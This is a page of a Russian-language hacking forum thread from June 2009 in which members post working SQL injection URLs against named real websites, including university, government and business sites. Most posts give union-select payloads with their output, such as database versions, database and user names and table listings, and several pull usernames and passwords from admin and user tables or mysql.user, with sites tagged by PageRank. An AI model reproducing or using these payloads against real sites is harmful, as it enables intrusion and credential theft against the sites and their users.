ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #9971  
Старый 21.06.2009, 11:18
Аватар для pelligrim
pelligrim
Познающий
Регистрация: 26.04.2008
Сообщений: 31
Провел на форуме:
31474

Репутация: 53
По умолчанию

Код HTML:
http://www.rokent.com/news.php?id=-66+union+select+1,2,concat_ws(0x3a,version(),database(),user()),4--
4.1.22:rokcorp:foneport@localhost
Код HTML:
http://www.spiritgotgame.net/archived_news.php?news_id=-2+union+select+concat_ws(0x3a,version(),database(),user()),2,3,4,5,6,7,8,9,10,11--
4.0.15-log:spirit_got_game:spiritgotgame@localhost
 
Ответить с цитированием

  #9972  
Старый 21.06.2009, 11:29
Аватар для Gorev
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию

http://fogel.gl.ciw.edu/news.php?newsid=146+and+substring(version(),1,1)=x


Version : 3.23.58
 
Ответить с цитированием

  #9973  
Старый 21.06.2009, 12:29
Аватар для M.W.N.N.
M.W.N.N.
Участник форума
Регистрация: 05.01.2009
Сообщений: 191
Провел на форуме:
3020589

Репутация: 240
По умолчанию

Код:
http://www.cali.gov.co/corporativo.php?id=1860%27+union+select+1,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7,8,9,10,11+limit+1,1/*
version():5.0.26-Max
database():caligovco
user():portal@localhost
__
Код:
http://www.rao-ees.edu.ru/index.php?module=dsEnterprises&func=display&catid=2&eid=56+union+select+1,2,3,4,5,concat_ws(0x3a,version(),database(),user()),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22+limit+1,1/*
version():4.0.18-log
database():hr_energo_ru
user():hrenergo@localhost
___
Код:
http://www.spsrasd.info/es/detail.php?id=594+union+select+1,2,3,4,5,concat_ws(0x3a,version(),database(),user()),7,8+limit+1,1
version():5.0.58
database():cms
user():spsrasd@localhost
___
Код:
http://www.tiemposevero.es/ver-reportaje.php?id=230%27+union+select+1,2,3,4,5,concat_ws(0x3a,version(),database(),user()),7,8,9,10,11,12,13+limit+1,1/*
version():5.0.45
database():spainsevereweather
user():tiemposevero@localhost
___
Код:
http://www.trailrunning.co.za/events_detail.php?id=179+union+select+1,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7,8,9,10,11,12,13,14,15/*
version():5.0.32-Debian_7etch10
database():trailrun_db1
user():trailrun_1@dedi1146.nur4.host-h.net
 
Ответить с цитированием

  #9974  
Старый 21.06.2009, 12:31
Аватар для HAXTA4OK
HAXTA4OK
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
Провел на форуме:
4358210

Репутация: 2017


По умолчанию

http://www.canary.edu.np/news_and_notice.php?id=-1'+union+select+1,concat_Ws(0x3a,version(),user(), database()),3,4,5+--+

5.0.77-community:canarye_db@localhost:canarye_db
 
Ответить с цитированием

  #9975  
Старый 21.06.2009, 12:46
Аватар для --StraNger--
--StraNger--
Познающий
Регистрация: 04.01.2009
Сообщений: 94
Провел на форуме:
404716

Репутация: 145
Отправить сообщение для --StraNger-- с помощью ICQ
По умолчанию

Код:
http://www.fremontonline.org/menu1.php?id=-1+union+select+1,2,3,concat_ws(0x3a,user,password)+from+mysql.user/*

Последний раз редактировалось jokester; 21.06.2009 в 14:43.. Причина: swstechnology.com anosy.gov.mg БОЯНы
 
Ответить с цитированием

  #9976  
Старый 21.06.2009, 16:10
Аватар для Skofield
Skofield
Участник форума
Регистрация: 27.08.2008
Сообщений: 209
Провел на форуме:
1759582

Репутация: 394
По умолчанию

Код:
http://www.emersonprint.com.au/news-details.php?ID=-1+union+select+1,version(),3,4,5,6,7,8/*
Database Version: 4.1.21-standard
Database name: emerspr_cms
User name: emerspr_cms@localhost

------------------------------------------------------------------------------------------------------------------------

Код:
http://www.ncsa.illinois.edu/AboutUs/People/contact.php?id=-775+union+select+1,version(),3,4,5,6,7,8,9,10--
Database Version: 5.0.67-log
Database name: website
User name: webRead@parrotia.ncsa.uiuc.edu

Код:
17 :In database website found table category_list     0 :   ID     1 :   name     2 :   link_name  18 :In database website found table content_list     0 :   ID     1 :   name     2 :   table_name  19 :In database website found table dir_table     0 :   ID     1 :   parent_dir     2 :   name  20 :In database website found table division_content     0 :   ID     1 :   parent_div     2 :   lead     3 :   contact     4 :   short_desc     5 :   long_desc     6 :   name  21 :In database website found table file_table     0 :   ID     1 :   dir_id     2 :   file_name     3 :   file_type     4 :   page_id  22 :In database website found table image_content     0 :   ID     1 :   name     2 :   URL     3 :   ALT  23 :In database website found table links_content_table     0 :   ID     1 :   HREF     2 :   title0     3 :   title1     4 :   title2  24 :In database website found table news_content_table     0 :   ID     1 :   title     2 :   date     3 :   release_date     4 :   storyLink     5 :   short_Blurb     6 :   full_Story     7 :   contact     8 :   location     9 :   category     10 :   storyType     11 :   images     12 :   vid_link  25 :In database website found table page_table     0 :   ID     1 :   name     2 :   title     3 :   navtype     4 :   navBox     5 :   related     6 :   external     7 :   body     8 :   style     9 :   template     10 :   keywords  26 :In database website found table people_content     0 :   ID     1 :   first_name     2 :   last_name     3 :   title     4 :   email     5 :   office     6 :   phone     7 :   division     8 :   description     9 :   client_id  27 :In database website found table people_test     0 :   ID     1 :   first_name     2 :   last_name     3 :   title     4 :   email     5 :   office     6 :   phone     7 :   division     8 :   description     9 :   client_id  28 :In database website found table project_content     0 :   ID     1 :   name     2 :   group     3 :   funding_source     4 :   contact     5 :   lead     6 :   members     7 :   partners     8 :   short_desc     9 :   long_desc  29 :In database website found table pubresearch_content     0 :   ID     1 :   title     2 :   author     3 :   link     4 :   biblio     5 :   category     6 :   date     7 :   publication_citation     8 :   publication_abstract     9 :   date_revised     10 :   publication_grant     11 :   pub_type  30 :In database website found table story_types     0 :   name
nothing interesting

Последний раз редактировалось Skofield; 21.06.2009 в 16:38..
 
Ответить с цитированием

  #9977  
Старый 21.06.2009, 16:38
Аватар для DezMond™
DezMond™
Участник форума
Регистрация: 10.01.2008
Сообщений: 199
Провел на форуме:
961428

Репутация: 662
Отправить сообщение для DezMond™ с помощью ICQ
По умолчанию

Код:
http://nuclear-coffee.com/ru/news.php?ID=-35+union+select+1,2,concat_ws(0x3a3a,ID,Link,Name,MainSite,ExampleURL),4+from+websites+--+
Код:
http://www.lesducsdangers.fr/news.php?ID=-823+union+select+1,concat_ws(0x3a3a,username,user_password,user_level),3,4,5,6,7+from+forum_users+limit+1,1+--+
http://www.lesducsdangers.fr/news.php?ID=-823+union+select+1,concat_ws(0x3a3a,user_type,username,user_password,user_email),3,4,5,6,7+from+newforum_users+limit+1,1+--+
Код:
http://www.swcrc.com/content.php?id=-43+union+select+1,2,3,4,group_concat(adminuser,char(58),adminpass),6,7,8,9,10,11+from+adminsetting+--+
 
Ответить с цитированием

  #9978  
Старый 21.06.2009, 17:35
Аватар для RulleR
RulleR
Reservists Of Antichat - Level 6
Регистрация: 12.06.2008
Сообщений: 157
Провел на форуме:
3217552

Репутация: 1668
Отправить сообщение для RulleR с помощью ICQ Отправить сообщение для RulleR с помощью Yahoo
По умолчанию

[PR 6]
Код:
http://www.consulplan.net/noticias/noticia.php?id=-95+union+select+1,2,3,4,unhex(hex(concat_ws(0x3a,version(),database(),user()))),6,7,8,9,10,11
4.1.18-nt-log:consulplan:consulplan_user@localhost
=================
[PR 5]
Код:
http://www.semanario.pt/seccao.php?id_seccao=-2+union+select+1,concat_ws(0x3a,version(),database(),user()),3--
4.0.16-standard-log:semanario:semanario@localhost
=================
[PR 4]
Код:
http://www.tuk-tuk.com/board/detail.php?id=-77+union+select+1,2,3,4,concat_ws(0x3a,version(),database(),user()),6,7,8,9,10,11,12,13,14,15
5.0.22:tuktuk_web:tuktuk_user2550@localhost
Код:
http://www.tuk-tuk.com/board/detail.php?id=-77+union+select+1,2,3,4,5,group_concat(table_name),7,8,9,10,11,12,13,14,15+from+information_schema.tables+where+table_schema!=0x696e666f726d6174696f6e5f736368656d61+and+table_name%3E0x74756b74756b5f6d6f645f70616765696e666f
http://www.tuk-tuk.com/board/detail.php?id=-77+union+select+1,2,3,4,5,group_concat(column_name),7,8,9,10,11,12,13,14,15+from+information_schema.columns+where+table_name=0x74756b74756b5f73797374656d5f75736572
data from table 'tuktuk_system_user'
Код:
http://www.tuk-tuk.com/board/detail.php?id=-77+union+select+1,2,3,4,5,concat_ws(0x3a,tuktuk_system_user_ID,tuktuk_system_user_Name,tuktuk_system_user_Password),7,8,9,10,11,12,13,14,15+from+tuktuk_system_user
=================
[PR 4]
Код:
http://www.cenertec.pt/cursos.php?id=-80+union+select+1,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
5.0.81-community:cenertec_site:cenertec_site@localhost
 
Ответить с цитированием

  #9979  
Старый 21.06.2009, 18:55
Аватар для Skofield
Skofield
Участник форума
Регистрация: 27.08.2008
Сообщений: 209
Провел на форуме:
1759582

Репутация: 394
По умолчанию

http://www.stevensgroup.org/page.php?id=-13+union+select+group_concat(username,0x3a,passwor d),2,3+from+users/*

Database Version: 4.1.22-standard
Database name: stevensg_msgdb
User name: stevensg_msgdb@localhost

--------------------------------------------------------------------------------------------------------------------------

PR 6

Код:
http://www.itr.unisa.edu.au/news/seminardetails.php?id=-549+union+select+1,2,3,4,5,6,7,8/*
Database Version: 5.0.22
User name: apache@dmzserver8.itr.unisa.edu.au

Последний раз редактировалось Skofield; 21.06.2009 в 19:44..
 
Ответить с цитированием

  #9980  
Старый 21.06.2009, 20:04
Аватар для rolex
rolex
Познающий
Регистрация: 07.04.2009
Сообщений: 40
Провел на форуме:
8945659

Репутация: 103
Отправить сообщение для rolex с помощью ICQ
По умолчанию

PR 5
Цитата:
http://www.chapman.com/newsevents.php?&CategoryID=55+union+select+1111,co ncat_ws(0x3a,database(),version(),user()),3333,444 4,5555,6666--
pnc_chapman:4.0.24-lognc_chapman@localhost
=====================================
PR 4
Цитата:
http://www.systems.ugent.be/member.php?id=9999999+union+select+1,2,3,4,5,6,7,c oncat_ws(0x3a,database(),version(),user()),9,10,11 ,12,13,14,15,16--
systems:5.0.51a-3ubuntu5.4:systems@webhost.ugent.be
=====================================
PR 4
Цитата:
http://www.irishphotographers.com/member.php?id=99999999+union+select+1,2,3,4,5,6,7, 8,9,10,11,concat_ws(0x3a,database(),version(),user ()),13,14,15,16,17,18,19--
natal_ippa:5.0.45-log:natal_ippa@web11.hosting365.ie
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ